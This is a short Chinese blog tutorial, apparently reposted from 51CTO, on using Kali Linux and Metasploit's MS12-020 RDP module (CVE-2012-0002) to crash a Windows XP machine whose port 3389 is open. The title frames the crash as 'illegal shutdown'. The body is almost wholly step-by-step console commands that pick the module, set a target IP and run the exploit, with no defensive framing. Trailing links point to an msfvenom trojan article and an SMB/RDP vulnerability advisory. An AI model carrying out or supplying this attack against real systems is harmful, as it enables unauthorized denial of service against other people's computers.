kali之入侵XP系统3(非法关闭计算机)

简介:

保证网络连通性,配置网络

开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start

root@kali:~# msfconsole

wKioL1lTdiLApAAHAAMAwVaZ7zY146.jpg

前提目标主机3389端口开放

msf >search CVE_2012_0002 查找ms12_020漏洞
msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 使用ms12_020漏洞
msf >set rhost 192.168.48.100  定义攻击目标ip
msf >exploit

wKiom1lTdnqwAYhwAANXGA6aXVo276.jpg

wKiom1lTdn-w3_iiAAF8QITif7o729.jpg











本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1942786,如需转载请自行联系原作者
目录
相关文章
|
11月前
|
安全 Windows
msfvenom生成木马之控制靶机
msfvenom生成木马之控制靶机
189 0
|
安全 Windows
【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞
2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确保您在阿里云上的业务安全,请您关注,具体漏洞详情如下: 漏洞编号: 暂无 漏洞名称: Windows系统多个SMB\RDP远程命令执行漏洞官方评级: 高危 漏洞描述: 国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,可以利用SMB、RDP服务成功入侵服务器。
1469 0
|
安全 Windows
高危Windows系统 SMB/RDP远程命令执行漏洞 手工修复办法
 1、Windows Update更新补丁方式: 更新方法:点击“开始”->“控制面板”->“Windows Update” ,点击“检查更新”-“安装更新”:   2、检查安装结果: 点击“查看更新历史记录”,检查安装的补丁: 3、重启系统生效 漏洞参考: https://blogs.
1394 0